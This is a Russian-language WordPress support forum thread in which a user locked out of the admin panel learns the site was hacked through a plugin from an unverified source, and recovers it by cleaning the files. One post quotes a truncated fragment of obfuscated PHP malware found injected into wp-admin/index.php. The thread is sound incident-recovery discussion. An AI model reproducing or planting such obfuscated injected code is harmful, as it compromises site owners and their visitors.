После обновления WP до 6 нет доступ в админку

Решено std31
(@std31)

9 месяцев, 3 недели назад
Посмотрел различные решения.
Ни плагины ни тема не виноваты, в логах админки следующая запись:
```
[09-Jun-2022 10:27:03 Europe/Kiev] PHP Warning:  require(/home/std31/public_html/wp-admin/wp-blog-header.php): failed to open stream: No such file or directory in /home/std31/public_html/wp-admin/index.php on line 6
[09-Jun-2022 10:27:03 Europe/Kiev] PHP Fatal error:  require(): Failed opening required '/home/std31/public_html/wp-admin/wp-blog-header.php' (include_path='.:/opt/alt/php74/usr/share/pear') in /home/std31/public_html/wp-admin/index.php on line 6
```
Файлы в голове public_html присутствуют.
- Тема изменена 9 месяцев, 3 недели назад пользователем std31.
Страница, с которой нужна помощь: [войдите, чтобы увидеть ссылку]

Просмотр 8 ответов — с 1 по 8 (всего 8)

Модератор Sergey Biryukov
(@sergeybiryukov)

Live and Learn

9 месяцев, 3 недели назад
Failed opening required ‘wp-admin/wp-blog-header.php’
…
wp-admin/index.php on line 6

Похоже, что сайт взломан:
- В WordPress нет файла wp-admin/wp-blog-header.php, он есть только в корневом каталоге.
- Ни в wp-admin/index.php ни в index.php в строке 6 нет подключения файла wp-blog-header.php.
Автор std31
(@std31)

9 месяцев, 3 недели назад
Сергей, Спасибо за рекомендации

Скачал wordpress 6 с оф сайта, распаковал и взял из папки ..\wp-admin\index.php и заменил его на сервере. И обнаружил, что содержимое файла превратилось вот в это
```
<?php
$OO0__00_OO=urldecode("%6f%41%2d%62%4e%6e%4b%37%4c%35%5f%4a%55%74%52%78%49%59%2b%57%43%61%39%33%56%6b%30%77%4d%31%4f%65%53%44%64%42%32%6a%2f%6c%73%58%66%7

ТУТ ДОВОЛЬНО МНОГО ЭТОЙ ФИГНИ 

${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x30\x5f\x4f\x5f\x4f\x30"]($O_00__O0OO);die();}$O00_O_OO0_=OOO0O_0_0_($O_00__O0OO);if($O00_O_OO0_!==false){foreach($O00_O_OO0_["\x68\x65\x61\x64\x65\x72\x73"] as $OO0_O_O00_){@header($OO0_O_O00_);}echo $O00_O_OO0_["\x64\x61\x74\x61"];die();}}OO00O0O___($O0O_0_O0_O);
?>
<?php
define( 'WP_USE_THEMES', true );
require __DIR__ . '/wp-blog-header.php';
```
Так ведь не должно быть?
Наверное буду следовать совету из статьи если вас взломали.
- Ответ изменён 9 месяцев, 3 недели назад пользователем std31.
- Ответ изменён 9 месяцев, 3 недели назад пользователем std31.
Автор std31
(@std31)

9 месяцев, 3 недели назад
Скачал сайт на локальный сервер (open server)
Импортировал бд с сайта в локальную бд
внес изменения в таблицу wp_options.php
-поменял URL

внес изменения в файл wp_config.php
-Имя базы данных для WordPress
-Имя пользователя базы данных root
-пустой пароль бд
таблице wp-users
-поменял пароль у админа (свойство поля md5 ставил)

В админку я теперь захожу, но в ней только текстовая версия без оформления, и у меня нет прав доступа что либо изменить.
пишет
```
>Доступ запрещён!
>У Вас нет прав доступа к этому объекту. Файл недоступен для чтения, или сервер не >может его прочитать.
>Error 403
```
плагины отключал
темы отключал
и то и другое вместе отключал не помогло
.htaccess отключал, заменял на новый от wordpress 6 версии

Что делать, куда копать?
- Ответ изменён 9 месяцев, 3 недели назад пользователем std31.
- Ответ изменён 9 месяцев, 3 недели назад пользователем std31.
- Ответ изменён 9 месяцев, 3 недели назад пользователем std31.
Anonymous User 17160716
(@anonymized-17160716)

9 месяцев, 3 недели назад

std31, привет.

Что делать, куда копать?

Вы выбрали путь боли и страданий, поднимая явно скомпрометированный сайт на локальном сервере, не говоря о том, что это просто небезопасно, если вы не имеете опыта работы с такими случаями.

В админку я теперь захожу, но в ней только текстовая версия без оформления, и у меня нет прав доступа что либо изменить.

Очевидно, пробелма с правами доступа к файлам и директориям. Тут, конечно, можно посоветовать это всё восстановить, чтобы заработало «как надо», но не совсем ясна ваша итоговая цель. Вы это делаете на локалхосте для чего?

Автор std31
(@std31)

9 месяцев, 2 недели назад

Привет m0ze,

Я хочу получить доступ к своим данным и сохранить статьи блога.
Получить права admin

Подумал раз проблемы с правами доступа, то уж на локальном сервере я смогу до них добраться.
А еще решил не экспериментировать на работающем сайте. Изменить я на нем ничего не могу, но он хотя бы работает.

>Очевидно, проблема с правами доступа к файлам и директориям.
Посмотрел на права директории wp_admin 755
файлы внутри 644
У всех директорий и файлов таки права
кроме public_html\index.php у него 444

m0ze, вы оказываете платные консультации?

Модератор Yui
(@fierevere)

永子

9 месяцев, 2 недели назад

с предложениями фриланса, платных консультаций и прочего внефорумного — в раздел «Специалисты»
во всех других разделах это считается нарушением правил форума.

Anonymous User 17160716
(@anonymized-17160716)

9 месяцев, 2 недели назад

std31,

Я хочу получить доступ к своим данным и сохранить статьи блога.
Получить права admin

Если вы владелец сайта, то, по логике вещей, у вас аккаунт администратора должен быть. Я что-то упустил? Из ранее написанного я понял, что у вас проблема именно с вредоносным кодом, который мешает/блокирует штатную работу сайта, но не с аккаунтом администратора.

Подумал раз проблемы с правами доступа, то уж на локальном сервере я смогу до них добраться.

Опять же, из выше описанного (скорее всего) проблема с правами у вас на локальном сервере.

m0ze, вы оказываете платные консультации?

Да, и сайты восстанавливаю после взлома, но если нужен обмен контактами, то это делается в разделе «Поиск специалистов».

Автор std31
(@std31)

9 месяцев, 2 недели назад

С проблемой разобрался.
сайт был взломан через плагин из непроверенного источника.
Был установлен доп плагин, который шифровал index.php админки и другие файлы, блокировал пользователя admin для внесения каких либо изменений.

Вариант лечения, скачать все файлы на локальном сервере чистить от вредоносного кода.

Спасибо всем кто откликнулся. 🤝

Просмотр 8 ответов — с 1 по 8 (всего 8)

Тема «После обновления WP до 6 нет доступ в админку» закрыта для новых ответов.

Метки темы

Просмотр